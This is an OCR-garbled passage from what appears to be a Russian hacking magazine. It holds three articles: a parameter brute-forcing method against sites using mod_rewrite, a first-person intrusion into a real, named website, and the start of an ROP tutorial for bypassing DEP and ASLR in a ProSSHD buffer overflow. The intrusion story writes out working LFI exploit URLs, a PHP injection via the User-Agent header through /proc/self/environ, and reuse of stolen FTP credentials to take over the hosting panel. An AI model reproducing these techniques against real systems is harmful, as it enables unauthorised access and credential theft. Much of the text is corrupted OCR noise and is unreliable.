2. Трудно определить язык программирования, на котором написано при- 
ложение. За ссылкой ЬіІрУ/ѵѵѵѵѵѵ.ехаппрІе.сопп/ппаіп/агІісІез/зІаІѵа.ЫтІ 






[+] Анліуіл ЬтіРі АіцщкхдК аІ 

[+] ЖвнІ діигЬ Тіу ю ііегест. 

|+] Кіікі яи<Ь Тіу Го 
[+] Ршіі йщіЬ Тгу (о (ІеГрсГ- 
[+) Ной пчітЬ Тіу ео <1егеет, 

[+] Кий яідгіі Тіу М Реглет. 

|+| Кий шііі Тіу N 1 йеГегГ, 

[+] Рііиі яітпіЬ Тіу ел ііе-гест. 

1+) Епй яінітЬ Тіу (ѵ «Іе'Гегт- 
[+] Ипй ДШ.ГІ 1 Тіу ел йеелее. 

[+] Ршй! Ьяр: ■■] 1 . пішДрх ■ рІгр'ЗіДд— 1 А 

[+] Рш<1 яиітЬ Тіу ел ііеглп. 

1+] Еий яитЬ Тіу ю ДегееТ- 
[+] Епй аттЬ Тіу ел Длеле г. 

[+| ГшД діиііі Тіу ел ііеелгі. 

[+] РтЛ яі пгіі Тіу ел сіеглс*. 

|+1 Кий кшгіі Тіу ел Деіегі, 

[+] Кий шйі Тіу ел Деееет. 

[+] Еімі зшгЬ Тіу ел Дегт. 

1+1 1'шсі т<1і Тіу ел ДеГесЬ 

І+1 Ріікі! 1 . т- ііні р х . і>1и>7 я -1 А 

(+] Б лил 

Пример работы фазера (перебор до 3 символов) 
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Тіу «О іірірг [ 
Тіу то 4 *ікі 
Тіу»о 

Тіу іо іЫег* 
Тіѵіо ііеіесг 



+| Лііфи ЬНіѵ 
+і \Ѵ<йтШл^ ]дім)?ЕІ я - »'Ф1 1|^ 
+]Ріаі 1 *ші 1 і 
+ІВ»1 ЧП>ІІ 
+І РіиН ігаф * 

+] Рыиі *шіЬ ' 

+] КііД чіп?]> Хіу 

+] Гыкі ипііі Тіѵ то ііеге о. 

+] ГикІ яп*1і Тіу іо ікк сі 
+І Гш<1 шіііі Тіу »о 4*тет(. 

+1 РіиЛ ти»Ь Тіу то тт. 
+)йи4’ Ь«еі_ 



> ші^еу ріір^ 



Ыо\ріш?чсі Ш=2$& 



Пример работы фазера (комбинированная атака) 



может находиться каксерверный сценарий на языке РНР, А5Р или Регі.так 
и статическая страница на языке НТМІ_; 

3. Наличие регулярных выражений, которые можно использовать в 
правилах перезаписи тоб_геѵѵгіІе, позволяет фильтровать входные 
параметры (далее будет рассмотрен пример); 

4. При автоматизации поиска уязвимостей необходимо заменять 
некоторые символы (например, слеш («/»] на %2Р (Ьехабесітаі 
епсобіпд) или % 2 5 2 Р (боиЫе епсобіпд)), так как они обрабатываются 
еще на стадии «разбора» ИРИ-адреса в тоб_геѵѵгі1:е. 

В связи с этим многие разработчики и администраторы предпочи- 
тают «маскировать» наличие уязвимостей с помощью тосІ_геѵѵгіІе, 
а не обнаруживать и исправлять проблемы. Но такой подход, как 
и любой метод, основанный на подходе Зесигбу ТЬгоидб ОЬвсигбу, 
работает весьма плохо. 

МЕТОДИКА РАБОТЫ 

Основная идея поиска уязвимостей при включенном тоб_геѵѵгі1:е — 
это перебор (ЬгиТе-іюгсе), позволяющий определить реальные имена 
реальных параметров серверных сценариев, в которые подстав- 
ляются значения из правил перезаписи (геѵѵгіТе гиіез] тоб_геѵѵгі1:е. 
Основные особенности перебора: 

• использование в одном запросе множества параметров (коли- 
чество параметров ограничивается максимальной длиной 1)РІ_ (по 
умолчанию для веб-сервера Арасбе 2.x — 8192 символа, для N5 — 

1 6 384 символа); 

• применение метода бинарного поиска (дихотомии) для обнаруже- 
ния необходимых параметров; 

• словарный перебор (использование популярных названий 
параметров и префиксов) — іб, соипТ, и т.д. в сочетании с полным 
перебором названий параметров (комбинированные атаки); 

• различные варианты анализа результатов (рассматривается далее); 

• возможность рекурсивного поиска параметров (для поиска всего 
множества параметров одного сценария). 

Рассмотрим алгоритм поиска уязвимостей в веб-приложении при 
включенном тоб_геѵѵгіІе. 

1. Определение реального имени серверного сценария. 

Используются стандартные и популярные названия сценариев, такие 
как іпбех.рИр, таіп.рНр. Необходимо определить, существует ли данный 
сценарий (например, по наличию ошибки «404 — І\ІоІ РоипсІ»). Иногда 
правила могут перезаписывать любые ІІПІ_-адреса, начиная с корневого 
каталога веб-сервера, то есть запрос Ыір://ѵѵѵѵѵѵ.ехатр[е.сопп/іпбех.рЬр 
уже будет вести на абсолютно другой сценарий (РеѵѵгііеПиІе Л (.+)$ зсгірі. 
рбр?$1 ). В таком случае дальнейшие проверки не имеют смысла. 



2. Определение параметров, поступающих в приложение. 

Наиболее часто разработчики веб-приложений используют такие 
популярные названия параметров, как іб, біе и т.д. Учитывая это, 
необходимо проверить: 

• самые популярные названия переменных (іб, раіб, раде, бебид, саі: 
и п роч .) ; 

• короткие названия переменных (1-5 символов) в алфавите [а-гО-9- 
_] — полный перебор; 

• «гибридные» названия — по формулам: 

"префикс" + "популярное название параметра"; 
"популярное название параметра" + "постфикс"; 

"полный перебор" + "разделитель + "популярное 

название параметра"; 

"популярное название параметра" + "разделитель 
+ "полный перебор" . 

• для кода, в названиях переменных которого исполь- 
зуются различные суффиксы и префиксы; 
переменные-массивы (рагаш[]). 

Говоря о последнем типе параметров, нужно отдельно уточнить: дело 
в том, что если в РНР-сценарии к параметру, инициализированному 
как массив (Шр://ехатрІе.сот/іпбех.рЬр?рагат[]=ѵаІие), произойдет 
обращение как к простому типу, будет выведена ошибка (в зависимости 
от еггог_герогбпд Іеѵеі), что приведет к раскрытию установочного пути. 
Также можно использовать: 

• массивы 6І_0ВАІ_5 (Ьир://ехатрІе.сот/іпбех.рЬр?6І_0ВАІ_5[ѵаг]= 
ѵаіие); 

• стандартные переменные _5ЕРѴЕР (в определенных случаях можно 
перезаписать и их); 

• переменные в сочетании с их 2епб_ба5б_кеу (для обхода уязвимых 
функций ипзеШ). 

3. Определение значения параметров. 

Для решения этой задачи важно использовать различные варианты 
параметров. Если, например, везде подставлять в значение 1 , то 
велика вероятность, что оно совпадет со значением переменной по 
умолчанию, и сервер вернет тот же ответ. Также различные парамет- 
ры — это различные ошибки. А если проводить поиск по значению 
параметра в ответе (потенциальные Х55, Еосаі Рііе Іпсіибіпд, Рабз 
Тгаѵегзаі, еЕс) , то для каждого параметра потребуется генерировать 
уникальное значение. 

Возможные варианты, их предназначение, плюсы и минусы: 

• Числовое значение: 0,1,2,.. Самый простой вариант. Можно обой- 
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тись 3 вариантами: О, 1 и >1. Из плюсов — минимальная 
длина строки запроса, что практически не сказывается 
на производительности работы. 

• Ошибочное значение: «'», «../», « а % 0 0 » и т.д. — раз- 
личные наборы символов, которые могут привести к 
потенциальным ошибкам, по сигнатурам которых можно 
определить присутствие параметра. 

• Фиксированное значение параметра. Например, если 
существует II В |_ ЬіфУ/ехатрІе.сот/таіп/зеагсЬ/зіхока 
роізка , то, зафиксировав ответ сценария на значение 
зІгока_роізка и подставив это значение во все параметры, 
по ответу, совпадающему с эталонным значением, можно 
будет найти параметр, отвечающий за конкретную позицию 
в ІІПІ_-адресе, см. пример ниже. 

• Случайное число. Генерируя достаточно длинные слу- 
чайные числа (5-9 символов], можно искать совпадение 
с этими числами в ответах сценариев. Случайные числа 
дают большую вероятность отсутствия ошибки второго 
рода (Еаізе Розібѵе]. 

Например, 11П1_ 

отвечает за сценарий поиска с параметром «Іезі». Нам 
необходимо найти оригинальный параметр строки поиска. 
Для этого мы фиксируем сигнатуру со отраниі |ы Мир:// 
еха т ріе. сот/та іп/зеагсбДезІ: (например, «по запро- 
су <Ь>1ез1</Ь> найдено») и проводим перебор по всем 
параметрам, подставляя в значение параметра «Іезі». 
Анализируя ответы, по наличию сигнатуры можно найти 
необходимый параметр. 

4. Составление запроса и подбор. 

Составить запрос вида ИДрѴ/ехатрІе.сот/зсгірГ 
рНр?рагат1 =ѵаІие&рагат2=ѵаІие&. . .&аЬс=ѵаІие . Огра- 
ничение на длину ІІРІ_ запроса составляет 81 92 символа 
(для сервера АрасИе). Это означает, что все параметры из 
алфавита [а-гО-9] с длиной до 4 символов можно пере- 
брать примерно за 5880 запросов. При хорошей скорости 
интернета это займет 3-5 минут. 

5. Анализ ответов и определение наличия параметра. 

Эта часть работы алгоритма — самая важная, поскольку 
именно она определяет эффективность работы. Отличия 
в структуре веб-приложений и различные условия 
обуславливают решение о выборе того или иного метода 
анализа ответа. Рассмотрим плюсы и минусы различных 

ПОХОДОВ: 

• определение по длине ответа. 

ПЛЮСЫ: 

Самый быстрый и простой способ. Необходимо лишь 
узнать длину эталонного запроса (без параметров) и 
сравнить ее с длиной запросов с параметрами. 

МИНУСЫ: 

Данный метод неприменим в ситуациях, когда каждый 
раз сценарий генерирует ответ с уникальным содер- 
жимым (баннеры, случайный контент, наличие строки 
запроса в ответе]. 

• определение по сигнатурам случайных значений пере- 
менных. 

ПЛЮСЫ: 

Уменьшение числа ложных срабатываний. 

МИНУСЫ: 

Необходимо удалять ложные срабатывания, связанные 
со штатным попаданием случайного значения в ответ 
(например, при штатном наличии данных запроса в 
ответе]. 

Уменьшение скорости из-за увеличения длины значе- 
ний параметров (с 1-2 символов до 5-7 символов, что 
увеличивает время перебора в 1,5-2 раза для парамет- 
ров длиной до 4 символов]. 



• определение по фиксированным ответам. Например, 
когда необходимо определить параметры на странице 
ШрУ/ехатрІе.сот/таіп/зеагсб/зІгока роізка , мы должны 
подставлять во все переменные значение «зІгока_роізка» 
и отслеживать ответ. Верным будет параметр, попавший в 
запрос, ответ на который совпал по содержимому с перво- 
начальной страницей. 

ПЛЮСЫ: 

Точность поиска. 

МИНУСЫ: 

Сфокусированность поиска — поиск происходит только 
по одному конкретному параметру. 

• определение по сигнатурам ошибок. 

ПЛЮСЫ: 

Почти полное отсутствие ошибок второго рода (Раізе 
Розібѵе — ложное срабатывание], что исключает 
идентификацию наличия параметра в запросе, когда на 
самом деле его в нем нет. 

МИНУСЫ: 

Требуется использовать базу сигнатур ошибок. Если на- 
личие параметра не вызывает ошибку, то данный метод 
не выявит параметр. 

Как видно из вышеизложенного, различные методы 
эффективны в разных ситуациях. Самым простым и, 
порой, наиболее действенным является первый подход, 
но иногда нельзя выявить параметр даже с помощью 
сложных методов. 

Поэтому желательно использовать различные методи- 
ки или решать в каждом конкретном случае отдельно, 
какая методика уменьшит число ложных срабатыва- 
ний. В конце концов, если в результате работы будет 
выявлено 10-15 переменных, они всегда могут быть 
проверены на предмет ложных срабатываний вручную. 

ПРАКТИЧЕСКАЯ РЕАЛИЗАЦИЯ 

В качестве практической демонстрации эффективности 
приведенных методов может быть использован фазер, 
который ты найдешь на прилагаемом к журналу диске. 
Фазер реализует следующие возможности: 

1. Полный перебор по алфавиту, по наиболее час- 
то встречаемым параметрам (указываются в файле 
рагатз.М], в комбинированном режиме («популярное 
название параметра» + «разделитель (_,-]» + «полный 
перебор»]. Также можно указать флаг, при котором 
каждая переменная будет представлена в виде массива 
(рагатШ. 

2. Использование дихотомии для поиска параметров. 

3. Поиск по длине ответа (указывается первоначальная 
страница, ее размер]. 

4. Выбор первоначальной страницы с параметрами (напри- 
мер, Ьіф://ехатр[е.сот/іпсІех.рбр?раде=ас1тіп 1 для поиска 
множества вложенных параметров (указанные параметры, 
естественно, будут исключаться из проверки]. 

5. Выбор символов, подставляемых в значения пере- 
менных. 

З.Ы.: Некоторые из этих механизмов реализованы в 
сканере МахРаІгоІ компании Розібѵе Тесбпоіодіез. 

И НАПОСЛЕДОК... 

Приведенный метод подходит не только для оцен- 
ки защищенности веб-приложений, использующих 
тосІ_геѵѵгі1;е, но и для поиска переменных, которые могут 
быть перезаписаны при включенном параметре гедізІег_ 
діобаіз, а также для поиска недокументированных воз- 
можностей, таких как различные отладочные («беЬид»] 
режимы и т.д. Удачного тебе поиска! т 




НТТР://ѴѴѴШ 

I ■ 

> Ііпкз 

Немного ссылок по 
теме: 

• оѵѵазр.огд/іпсіех. 
рбр/РоиЫе Епсосііпд 
сНтопіпд.ги/как- 
парізаІ-зѵоу-сІѵігЬок- 
Ыода-1 .Ыті 

• УѵеЬзсгірЕги/зІо- 
пез/07/02/01/ 
20992691 

ги.ѵѵікіресііа.огд/ѵѵікі/ 

• Двоичный_поиск 

гагОтате/тузИ/ 

ргоѵегѵафе-іір-сіап- 

пух/ЬагсІепесІ-рЬр. 

пеі/дІоЬаІз-ргоЫет 

ЬагсІепесІ-рЬр.пеі:/ 

асіѵізогѵ 192005.78. 

Ыті 

• уѵізесЩ/ѵиІпз. 
рбр?ісІ=1 0 
ЬагсІепесІ-рЬр.пеі:/ 
Ьрбр/гепсІ ЬазЬ сіеі 
кеу ог іпсіех ѵиіпег- 
аЬШіѵ.ЫтІ 




> сЫ 

Уитту... 

На нашем диске 
ты можешь найти 
небольшой фазер, 
который умеет делать 
следующее: 

• Полный перебор по 
алфавиту; 

• Использовать 
дихотомию для 
поиска параметров; 

• Есть возможность 
поиска по длине 
ответа; 

• Проводить 
комбинированные 
атаки. 




> ѵѵагпіпд 

Внимание! 
Информация 
представлена 
исключительно 
с целью 

ознакомления! Ни 
авторы, ни редакция 
за твои действия 
ответственности 
не несет! 
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► Об7 





взлом 



НЕСТАНДАРТНОЕ ИСПОЛЬЗОВАНИЕ РР0СР5 



Может показаться, что взлом ѴѴеЬ-ресурсов превратился в некую рутину, в которой 
нет места творчеству: все те же ЗОЬинъекции, №, гіі и т.п. Но это абсолютно не 
так! Данная тема настолько обширна и необъятна, что предсказать то, как будет 
осуществлен конкретный взлом, и какие особенности атакуемой системы будут 
при этом использованы, заранее невозможно. Сейчас я это докажу на примере 
реальной атаки сайта и получения доступа к аккаунту на площадке хостера. 



Все началось довольно прозаично: читая почту в Отаіі, я наткнулся на 
новостную ссылку с информацией о найденной ошибке в компоненте 
Зоотіа фезеагсН. Более подробная информация говорила о том, что эта 
ошибка была типа Іосаі Яіе іпсіисііпд (Ііі). Бага заключалась в необрабо- 
танной должным образом функции гедиіге_опсе(], которая подгружала 
исходные тексты дополнительных классов, находящихся во внешних 
файлах. В общем, все стандартно, но мне захотелось опробовать ошибку 
в действии. Зарядив в поисковике запрос на поиск в БВІ_ фезеагсЬ, я 
стал искать объект для исследования, и мне на глаза попался научно- 
популярный редиско-сайт гесіізсоѵегзсіепсе. сот. Замечательная 
кандидатура. 

Первое, что полетело в качестве привета на сайт, был модифицирован- 
ный эксплойт с баітрекера: 

Ыгір : / /гесіізсоѵегзсіепсе . сош/сошропепС/з гезеаг 
сЪ./ ?Цазк=зЪом&ѵіем=риЫісаСіоп&іс1=18&сопЦго11е 
г= . /еДс/раззѵ\гсі%00 

К моему удивлению отобразился достаточно большой список пользо- 
вателей сервера. Хэши паролей хранились в збасіоѵѵ. Брутить сервисы 
по найденным логинам мне не хотелось, да и не нужно мне это было :]. 



Моей целью на тот момент была максимальная раскрутка ошибки просто 
ради спортивного интереса. 

Уже с самого начала было понятно, что сайт работает на СМ5 .Іооппіа, а 
все самое интересное, как известно, находится в ее конфигурационном 
файле — сопбдигабоп.рЬр (в этом файле лежат различные настройки 
сайта, в том числе пароли к РТР и базе данных]. Именно этот файл я 
выбрал для дальнейшего исследования. Естественно, что его инклуд 
ничего интересного не дал: РНР просто выкинул пустую страницу (все 
настройки сайта хранятся в виде РНР-класса]. Поэтому мне необходимо 
было найти возможность выполнения произвольного РНР-кода для того, 
чтобы прочитать содержимое конфига. 

В ПОГОНЕ ЗА КОНФИГОМ 

Попытка инклуда логов обломалась из-за установленных квот на по- 
требление памяти интерпретатором. Был еще один путь: проинклудить 
залитый на сервер графический файл с вставленным в него РНР-кодом, 
благо форум на сайте был, но это не был путь истинного йога. Поэтому, 
заново посмотрев эксплойт, который находился в ссылке новости, я 
обратил внимание, что в нем происходит инклуд файла виртуальной 
файловой системы ргос: /ргос/зеіі/епѵігоп, который незаслуженно в 
самом начале был заменен на /еіс/раззѵѵсі. В этом файле находится вся 



► 068 
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Вывод содержимого конфига на страницу 



информация о переменных окружения процесса, который 
обращается к данному файлу. И если посмотреть на то, что 
выдал мне сервер, после обращения по ссылке: 

Ьббр : //гебізсоѵегзсіепсе . сош/сошропепС/ 3 гез 
еагсЪ./ ?Сазк=з]тоѵ^&ѵіеѵ^=риЫісаЦіоп&іс 1 = 18 &соп 
Рго11ег= 

ргос/зе1Е/епѵігоп%00 



ДОПОЛНИТЕЛЬНАЯ 

ИНФОРМАЦИЯ 

ПРО РР0СР5 

РгосРЭ (сокращение от ргосезз біе зузіепп] — это 
виртуальная файловая система, используемая 
во многих ЦІпІх-Ике операционных системах для 
получения информации о системных процессах из 
ядра. Эта файловая система чаще всего монтируется 
в директорию /ргос. И так как /ргос динамически 
создается, а не хранится, ее размер ограничен только 
объемом оперативной памяти. РгосРЭ поддерживается 
І_іпих, Эоіагіз, В5Э, ОЫХ и другими ОС. 

Некоторые файлы и директории из РгосРБ: 
/ргос/Рів/стсІІіпе — аргументы командной строки 
(где РЮ — идентификатор процесса или зеіі); 
/ргос/Ріо/епѵігоп — переменные окружения для 
данного процесса; 

/ргос/Рів/зСаСиз — статус процесса; 
/ргос/РІП/М — директория, содержащая 
символьные ссылки на каждый открытый файловый 
дескриптор; 

/ргос/сриіпбо — информация о процессоре 
(производитель, модель, поколение и т.п.); 
/ргос/сшОІіпе — параметры, передаваемые ядру 
при загрузке; 

/ргос/ирСіше — количество секунд, прошедших 
с момента загрузки ядра и проведенных в режиме 
бездействия; 

/ргос/ѵегзіоп — содержит информацию о версии 
ядра, компилятора и другую информацию, связанную с 
загруженным ядром. 




Внутри срапеі 



то можно было увидеть содержимое переменных окружения 
РНР, которые были бы полезны для дальнейшего аудита 
сайта: 







БОСІІМЕКТ_КООТ — корень документов сайта; 
ЗЕКѴЕК_АББК — ІР- адрес сервера; 
ЗСКІРТ_ЕІЬЕКАМЕ — полный путь до іпсіех . ріір ; 
НТТР_ІІЗЕК_АСЕЫТ — название агента, с помощью 
которого юзер браузит по инету; 

НТТР_СООКІЕ — содержимое передаваемых куки- 
сов и т.п. 

Но, по сути, перед нами среда, в которую выводятся из- 
меняемые со стороны пользователя данные. Причем то, что 
приходит со стороны юзера прогоняется через интерпре- 
татор, то есть, если мы изменим содержимое какой-нибудь 
переменной на РНР-код, то он успешно выполнится! 

Не знаю почему, но мне захотелось сделать инклуд РНР- 
кода через кукисы. Сначала значение кукиса "Іа_ригі1у_1р1.", 
в котором хранилось имя модификации шаблона СМ5, 
был заменено на <? рбріпіоО; ?>. После инклуда /ргос/зеіі/ 
епѵігоп ничего интересного не произошло. Просмотрев 
содержимое переменной, я обнаружил, что оно по каким-то 
причинам обрезалось. Изменение значения переменной 

" иіта" на <? рЬріпГоО; ?> также не принесло результатов: 

содержимое этой переменной опять было обрезано. 

После того, как возня с кукисами прекратилась, в дело пошла 
модификация заголовка изег-адепб После того, как я заменил 
значение заголовка на свой любимый <? рЬріпГоО; ?> и про- 
инклудил переменные окружения РНР, передо мной отобрази- 
лось великолепие разных данных по текущим настройкам РНР. 
Посмотрев полный путь до папки сайта на сервере и сфор- 
мировав полный путь до сопбдигабоп.рбр, я, недолго думая, 
заменил изег-адепі на команду чтения файла, получилось 
нечто похожее на это: 

<? геаббііе ( " /Ьоте/гесІізсоЗ /риЫіс_НШт 1 / 
сопПідигабіоп.рІір" ) ; ?> 

А затем заново проинклудил вывод файла /ргос/зеіі/епѵігоп. 
Посмотрев внутрь страницы, я обнаружил виновника всего 
этого торжества — сопбдигабоп.рЬр. 



> ѵѵагпіпд 

Внимание! 
Информация 
представлена 
исключительно 
с целью ознакомления. 
Ни автор, ни редакция 
за твои действия 
ответственности 
не несет. 




НТТР://ѴѴѴШ 

1 Г 

> Ііпкз 

• зесигіМаЬ.ги/ 

ѵи Іпега Ьі 1Н:у/392546. 
рбр — Новость об 
ошибке 

• раскеіъіюгппзеси- 
гіІѵ.огд/ІООЗ-ехрІоіІз/ 
ІоотІаігеБеагсЬ-Іб. 
Ш — РоС-атаки 

на дополнение 
фезеагсб 

• хакер.ги/ 
розі/49508/сЫаиЦ. 
азр — статья ][ 
«Новая веха 

в теории инклуда: 
свежие способы 
раскрутки Іосаі 
и теплоте біе і п с I и сі е » 

• хакер.ги/тада- 
гіпе/ха/1 1 1/146/1 . 
азр — статья ][ 
«Секреты горячего 
администри- 
рования» 
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Модифицируем передаваемый НТТР-заголовок Вывод команды рІіріггіоО 



В ДЕБРЯХ РР0СР5 

Лезть в базу и добавлять юзеров для доступа к админке не хотелось. Ибо 
СМ5 отображает последних посетителей админки, что могло вызвать по- 
дозрение, а удалять эту инфу потом мне просто было бы лениво. Поэтому 
я полез разбираться дальше. Опять с помощью файлов, находящихся в 
ргос, я нашел очень много полезной информации: инклуд/ргос/сриіпію 
сообщил, что сервер работал на четырехядерном хеоп'е, а /ргос/ѵегзіоп 
показал очень интересный результат: 

Ьіпих ѵегзіоп 2 . 6 . 31 . 9-дгзес (гооС@меЬ55 . ^изСТюзС . 
сош) (дсс ѵегзіоп 4.1.2 20080704 (Кесі НаС 4.1.2-46)) 

#1 ЗМР ТЛи РеЬ 25 02:14:17 СЗТ 2010 

Версия ядра меня не заинтересовала, но заинтересовал хостинг, и мне 
захотелось проверить аутентификационные данные из файла конфигу- 
рации для доступа к срапеі. Перейдя на сайт хостинговой компании, я 
попробовал залогиниться с логином и паролем от РТР. Логин прошел 
успешно, и у меня оказался полноценный доступ к панели. 




Подопытный сайт (анфас) 



ЗАРАБАТЫВАЕМ ХОРОШУЮ КАРМУ 

Закончилось все также прозаично, как и началось: я закрыл брешь на 
сайте и написал администратору сайта письмо с сообщением об уязви- 



мости и несколькими советами. В общем, даже если кажется, что вам 
все известно, то не надо останавливаться в своем развитии. Продолжай 
искать и зарабатывай хорошую карму :1 лг 



► 070 
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■ ■ Алексей Синцов, Рідііаі Зесигііу а.зіпізоѵгасізес.ги 




СТЕК 



1 

КОР 

КОР 

КОР 

КОР 

КОР 

ѴІКТІІМ РК0ТЕСТ 




ГаГаШ 1 ^ 

Рягят? 4 




генами. ^ і 

Ртиті 4 




ГаГаІІІо 1 | 

Па иа шуу / Ж 




гагагп4 ^ 

ЛІМР Е5Р 

МОР 

И0Р 

5НЕИС00Е | 





СТЕК 

I 



1 








► 

к 
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0x06060101 








► 


ОхВААйРООО 










0x06060201 








0x01020304 








0x06060301 






► 



Вот примерно так из кусочков 
и собирается код 



0x06060101 



рор есх 
геіп 



0x06060201 



рор еах 
геіп 



0x06060301 



тоѵ [еах], есх 
геіп 



Задача ВОР: создать 
в нужном месте 
нужные параметры 



Развратно- 
ориентированное 



программирование 



ТРЮКИ КОР ПРИВОДЯЩИЕ К ПОБЕДЕ 



Сегодня я расскажу про метод обратно-ориентированного программирования 
или, попросту, РОР Эта штука позволит добиться выполнения произвольного кода 
при эксплуатации уязвимостей типа переполнения буфера (а также использования 
освобожденной памяти, ошибки форматной строки и т.д.) в процессе с регшапепі- 
РЕР и даже с АЗІ.Р. 



опять? 

Да, опять! Очередная статья про обход ОЕР и А5І_Р. Если ты читал 
предыдущие выпуски нашего журнала, то уже знаешь несколько 
трюков, которые позволяют обходить защитные технологии люби- 
мой нами корпорации МісгозоЛ. Старая добрая геі21іЬс позволяла 
нам отключать ОЕР для процесса, а вот регтапепі ОЕР + АЗИН мы 
обходили методом ЛТ-5РРАѴ (если есть ЛТ-компилятор, напри- 
мер, Ріа з И ) . На этом хакерские хитрости не кончаются, более того, 
сегодня мы поговорим о методе, который использовался в боевых 
эксплойтах как белыми, так и не совсем белыми шляпами по всему 
миру. Пока ЛТ 5РРАУ эксплойты существуют только в лаборато- 



риях, и область их применения, как правило — браузеры, то вот 
сплойты, использующие РОР, уже доказали свою пригодность на 
деле. Кроме того, они могут использоваться и против ПО, где нет 
возможности юзать Ріа зЬ и ЛТ-5РРАУ. Если ты читал последние 
наши обзоры, то мог обратить внимание, что я не вру; так, напри- 
мер, эксплойт, распространяющий таіѵѵаге и эксплуатирующий 
уязвимость в АсгоЬаІ Пеабег (СѴЕ-201 0-01 88] — как раз яркий 
тому пример. Кроме того, этот метод использовался на р\л/п2оѵѵп 
для взлома іРЬопе и в эксплойте против РНР 6.0 ОЕѴ. Атак как 
наш журнал модный и глянцевый, то мы тоже не обойдем стороной 
тренд этого сезона. 
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Адрес возврата контролируется нами: Охбібібібі! 



0x06060101 // АААА — переписываем адрес 
возврата 

ОхВААБЕООБ // ВВВВ — это пойдет в есх 
0x06060201 // СССС - гебп вернет нас на сле- 
дующую инструкцию 

0x01020304 // ББББ — это значение пойдет в 
еах 

0x06060301 // ЕЕЕЕ — второй геЕп вернет нас 
на задуманный код 

Поэтому, если буфер для классического переполнения 
выглядит так: 



гФЬіі 



1 НТТР://ѴѴѴт1 



т 

> [Іпк5 



• сзеѵѵеЬ.исзсІ. 
есі и/~Ьоѵаѵ/сІ І5І/ 
деотеігѵ.рсТ — 

практически первая 
академическая 
работа на тему ПОР 
(2007 год]. 

• Ыір.ІѵЛіІе/3564232 

— видео с 
конференции 
Зоигсе Возіюп 2010. 
Известный хакер 

— Дион Дай Зови 
рассказывает о ПОР. 

• га .сот — 
присоединяйся 
к нам! 



ТУДА-СЮДА-ОБРАТНО... 

Для начала вспомним классику — геТ2Шэс. При клас- 
сическом варианте переполнения буфера мы можем 
менять адрес возврата из функции, переписывая его 
в стеке. Если этот адрес указывает на неисполняемую 
память (в том же стеке или, например, в куче], то нас 
ждет разочарование — ведь у нас Ьагбѵѵаге-регтапепі- 
зирег-рирег-ОЕР. Вот для обхода обычного Ьагсіѵѵаге- 
ОЕР метод геТ2Шэс и применялся. Суть его в том, что мы 
перезаписывали адрес возврата на адрес нужной нам 
функции. Так как код функции исполняемый, то проблем 
нет. Одно «но»: код функций переопределен. Мы, конеч- 
но, можем последовательно вызвать несколько функ- 
ций, но связать это в шеллкод практически невозможно, 
так как нам надо работать с переменными, дескрип- 
торами и т.д. Это все равно, что программа из одних 
АРІ-вызовов, без работы с переменными и, главное, без 
обработки возвращенного, вызываемыми функциями, 
результата. Тут-то и пришла идея более точечного ис- 
пользования существующего кода — не целыми функ- 
циями, а небольшими кусками кода, непосредственно 
до инструкции возврата. Это позволит атакующему 
работать с регистрами, производить операции и об- 
рабатывать результат. Допустим, как скопировать 
какое-либо значение (например, ОхВААОЕОСЮ) в память 
по определенному адресу (например, 0x01020304]? Так 
как в стек мы можем писать напрямую (в результате 
переполнения буфера], то параметры можно записать в 
самом буфере. Тогда для выполнения задачи нам нужен 
следующий КОД: 

рор есх ; берем значение из стека 
рор еах ; берем адрес 

шоѵ [еах] , есх ; копируем по адресу наше 
значение 

Чтобы выполнить этот код, мы можем найти отдельно 
каждую строчку, идущую перед инструкцией возврата, 
и внедрить указатели на эти строчки последовательно, 
вместе с параметрами. 

0x06060101: рор есх 
0x06060102: гебп 

0x06060201: рор еах 
0x06060202: гебп 



0x06060301: шоѵ [еах], есх 
0x06060304: гебп 



[ВБЕЕЕК] [КЕТ] 

то переполнение с ВОР будет выглядеть так: 

[ВІІЕЕЕК] [АААА] [ВВВВ] [СССС] [БОБО] [ЕЕЕЕ] 

Думаю, что суть идеи понятна, но сразу отмечу, что такой 
метод имеет много сложностей. Во-первых, такие куски 
кода еще надо найти, а во-вторых, у нас не всегда до- 
статочно места после переписанного адреса возврата 
(может возникнуть исключительная ситуация до пере- 
хода по нашему адресу, и тогда уже надо работать с 
5ЕН-дескриптором, но указатель на стек с адресами РОР 
мы потеряем]. Кроме того, в РОР-адресах чаще всего 
нельзя использовать нулевые байты. С некоторыми из 
этих проблем даже можно справиться. Допустим, мы 
нашли переполнение буфера в ПО. Чем подменить адрес 
возврата? Логично, что нам понадобятся адреса функций 
Ѵігіиа ІРгоІесІ: (чтобы пометить память с шеллкодом как 
исполняемую] или, например, ѴѴгіІеРгосеззМетогу (чтобы 
скопировать шеллкод в исполняемую секцию]. Если А5І_П 
нет, то задача проста — адреса функций нам известны, но 
вот адрес шеллкода? Его-то и надо вычислить, чтобы по- 
том передать в качестве параметра в эти функции. Кроме 
того, даже если А5І_В есть, можно найти используемые 
процессом библиотеки, которые не скомпилированы с 
поддержкой этой технологии, что позволяет нам использо- 
вать статичный базовый адрес таких ОбЕок (именно этот 
недочет и использовался для взлома ЕігеЕох, работающего 
под ѴѴіпсІоѵѵз 7 с А56В+0ЕР на рѵѵп2о\л/п 2010]. Суть в том, 
что даже если мы не знаем адрес нужной функции, но она 
вызывается из несовместимой с А56Р библиотеки, то мы 
можем просто передать управление на этот вызов. Идея не 
нова и предложена Алексом Сотировым (Аіех Зобгоѵ] еще 
на ВІаскНаІ: 08. Все зависит только от разнообразия кода 
в нужной нам 066. Так как нас интересуют инструкции в 
непосредственной близости с выходом из функции. 

КОР - РЕЗТ (Ж РАШ 

Попробуем сделать свою РОР-программу. Для начала вы- 
берем жертву. На этот раз никаких АсбѵеХ и браузеров — на 
нашем операционном столе пациент под именем РгоЗЗНИ 
версии 1.2. Это неплохой ЗЗН-сервис под ѴѴіпсІоѵѵз. В 
данном ПО возможно выполнить удаленное переполнение 
буфера в стеке путем длинного ЗСР-запроса. Оригиналь- 
ный эксплойт я взял у команды 52 Сгеѵѵ, которая славится 
своими качественными работами. Суть проста: посылаем 
491 байт запроса, а следующие 4 байта перезаписывают 
адрес возврата. В момент, когда программа переходит по 
этому адресу, у нас в вершине стека блок данных, идущих 
после первых 495 байт буфера. То есть: 



В итоге переполняем буфер так: 



[491 байт 'а' - 0x41] [КЕТ=ЕІР] 



► 072 
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[ ААААААААААААААААА ААААА АА ] 



ЕЗР 

Таким образом, вместо [ВЕТ] и последующих [ААААААА] нужно писать 
ВОР-программу. Но надо сказать, что не всегда бывает так, каку нас. 
Бывает, что эксплойт не может использовать адрес возврата. Напри- 
